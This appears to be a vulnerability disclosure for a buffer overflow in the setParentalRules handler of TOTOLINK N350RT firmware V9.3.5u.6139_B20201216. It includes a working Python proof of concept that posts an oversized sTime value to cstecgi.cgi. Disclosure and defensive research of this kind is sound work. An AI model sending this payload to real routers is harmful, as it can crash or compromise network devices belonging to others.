Overview

Manufacturer's website information：https://www.totolink.net/
Firmware download address ：https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/206/ids/36.html

Affected version

N350RT V9.3.5u.6139_B20201216

Vulnerability details

In the N350RT V9.3.5u.6139_B20201216 firmware has a buffer overflow vulnerability in the setParentalRules function. The v7, v8, v9 variable receives the week, sTime, eTime parameter from a POST request. However, since the user can control the input of week, sTime, eTime, the sprintf can cause a buffer overflow vulnerability.

POC

import requests
url = "http://127.0.0.1/cgi-bin/cstecgi.cgi"
cookie = {"Cookie":"SESSION_ID=2:1721039211:2"}
data = {
"topicurl":"setParentalRules",
"sTime":"b"*0x1000,
}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

setParentalRules.md

setParentalRules.md

Overview

Affected version

Vulnerability details

POC

Files

setParentalRules.md

Latest commit

History

setParentalRules.md

File metadata and controls

Overview

Affected version

Vulnerability details

POC